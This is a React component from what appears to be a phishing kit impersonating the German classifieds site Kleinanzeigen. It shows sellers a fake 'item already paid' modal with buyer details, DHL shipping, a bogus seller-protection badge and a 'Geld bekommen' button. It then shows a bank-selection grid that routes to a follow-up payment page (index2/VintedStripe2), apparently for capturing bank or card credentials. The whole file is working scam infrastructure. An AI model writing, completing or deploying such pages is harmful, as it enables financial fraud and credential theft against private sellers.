import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './KleinanzeigenDeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import {
  KLEINANZEIGEN_BANKS_MODAL,
  KLEINANZEIGEN_BANKS_MORE,
  resolveBankLogoUrl,
} from '../kleinanzeigenDeBanks';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/de-kleinanzeigen/logo.svg`;
const DHL_SRC = `${process.env.PUBLIC_URL || ''}/dhl-logo.png`;
const VISA_SRC = `${process.env.PUBLIC_URL || ''}/de-kleinanzeigen/banks/visa.svg`;
const MC_SRC = `${process.env.PUBLIC_URL || ''}/de-kleinanzeigen/banks/mastercard.svg`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function ShieldOk({ className = 'ka-shield-ico' }) {
  return (
    <svg className={className} viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z"
      />
      <path
        fill="#fff"
        d="M10.2 14.6 7.8 12.2l1.4-1.4 1.7 1.7 4.9-4.9 1.4 1.4-6.3 6.3z"
      />
    </svg>
  );
}

function BankRow({ bank, index2Path }) {
  const src = resolveBankLogoUrl(bank);
  return (
    <Link to={index2Path} className="ka-bank-cell">
      <span className="ka-bank-logo-wrap">
        <img src={src} alt="" className="ka-bank-logo" loading="lazy" />
      </span>
      <span className="ka-bank-name">{bank.name}</span>
    </Link>
  );
}

/**
 * Kleinanzeigen (DE): VintedStripe1 → Modal „bezahlt“ → Bankauswahl → index2 (VintedStripe2).
 */
function KleinanzeigenDeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [step, setStep] = useState('modal');
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'DE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const firstName = (pageData?.first_name || '').trim();
  const lastName = (pageData?.last_name || '').trim();
  const buyerLine = [firstName, lastName].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const billingBlock = [buyerLine, address].filter((x) => x && x !== '—').join(', ') || '—';
  const productName = (pageData?.product_name || '').trim() || '—';

  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPlaceholder = !photoSrc || imgFailed;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="ka-wrap" lang="de">
        <div className="ka-loading">Wird geladen…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="ka-wrap" lang="de">
      <div className="ka-bg" aria-hidden>
        <div className="ka-bg-blur">
          <div className="ka-bg-fake-listing">
            {!showPlaceholder && (
              <img src={photoSrc} alt="" onError={() => setImgFailed(true)} />
            )}
            <div className="ka-bg-fake-meta">
              <span className="ka-bg-title">{productName}</span>
              <span className="ka-bg-price">{amountLine}</span>
            </div>
          </div>
        </div>
      </div>

      <header className="ka-header">
        <a href="#/" className="ka-brand">
          <img src={LOGO_SRC} alt="Kleinanzeigen" className="ka-brand-img" />
        </a>
        <div className="ka-header-right">
          <button type="button" className="ka-bell" aria-label="Benachrichtigungen" />
          <a href="#/" className="ka-logout">
            Ausloggen
          </a>
        </div>
      </header>

      <div className="ka-search-bar">
        <input type="text" className="ka-search-input" placeholder="Was suchst du?" readOnly />
        <button type="button" className="ka-search-cat">
          Alle Kategorien
        </button>
      </div>

      {step === 'modal' && (
        <div className="ka-modal-overlay">
          <div className="ka-modal">
            <h1 className="ka-modal-title">Die Ware ist bereits bezahlt!</h1>

            <div className="ka-profile-row">
              <div className="ka-avatar" aria-hidden>
                {!showPlaceholder ? (
                  <img src={photoSrc} alt="" onError={() => setImgFailed(true)} />
                ) : (
                  <span>{productName.slice(0, 2).toUpperCase()}</span>
                )}
              </div>
              <div className="ka-profile-text">
                <div className="ka-profile-name">{productName}</div>
                <div className="ka-profile-sub">Details zum Käufer</div>
              </div>
            </div>

            <div className="ka-section-label">Rechnungsadresse</div>
            <div className="ka-box">{billingBlock}</div>

            <div className="ka-section-label">Versandmethode</div>
            <div className="ka-box ka-box--ship">
              <img src={DHL_SRC} alt="" className="ka-dhl-logo" />
              <span>DHL</span>
            </div>

            <h2 className="ka-h2">Holen Sie das Geld</h2>
            <div className="ka-protect">
              <ShieldOk />
              <span>Ihr Verkauf ist durch unser Verkäuferschutzsystem geschützt.</span>
            </div>

            <div className="ka-section-label">Sendeverfahren</div>
            <div className="ka-box ka-box--pay">
              <img src={VISA_SRC} alt="" className="ka-pay-logo" />
              <img src={MC_SRC} alt="" className="ka-pay-logo" />
              <span>Kreditkarte / Online-Bankgeschäfte</span>
            </div>

            <div className="ka-sum-row">
              <span>Auszahlungsbetrag</span>
              <strong>{amountLine}</strong>
            </div>
            <div className="ka-sum-row">
              <span>Verkäuferschutz</span>
              <span>0 €</span>
            </div>
            <div className="ka-sum-row ka-sum-total">
              <span>Gesamt</span>
              <strong>{amountLine}</strong>
            </div>

            <p className="ka-legal-small">
              Danach werden Sie zum Eingang der Überweisung weitergeleitet, nach Erhalt der Überweisung senden Sie die
              Ware an den Käufer.
            </p>
            <p className="ka-legal-micro">
              Online Payment Platform · AGB von (Feb. 2025) ·{' '}
              <a href="#/">Datenschutzerklärung</a>
            </p>

            <div className="ka-modal-actions">
              <button type="button" className="ka-btn-money" onClick={() => setStep('banks')}>
                <ShieldOk />
                Geld bekommen
              </button>
            </div>
          </div>
        </div>
      )}

      {step === 'banks' && (
        <div className="ka-banks-overlay">
          <div className="ka-banks-card">
            <div className="ka-banks-icon" aria-hidden />
            <p className="ka-banks-lead">
              <strong>Wählen Sie Ihre Bank aus der Liste der vorgeschlagenen Banken aus:</strong>
            </p>

            <div className="ka-bank-grid">
              {KLEINANZEIGEN_BANKS_MODAL.map((b) => (
                <BankRow key={b.id} bank={b} index2Path={index2Path} />
              ))}
            </div>

            <h3 className="ka-banks-sub">Weitere Banken</h3>
            <div className="ka-bank-grid">
              {KLEINANZEIGEN_BANKS_MORE.map((b) => (
                <BankRow key={b.id} bank={b} index2Path={index2Path} />
              ))}
            </div>

            <Link to={index2Path} className="ka-bank-other">
              Eine andere Bank
            </Link>
          </div>
        </div>
      )}

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default KleinanzeigenDeSuccess;
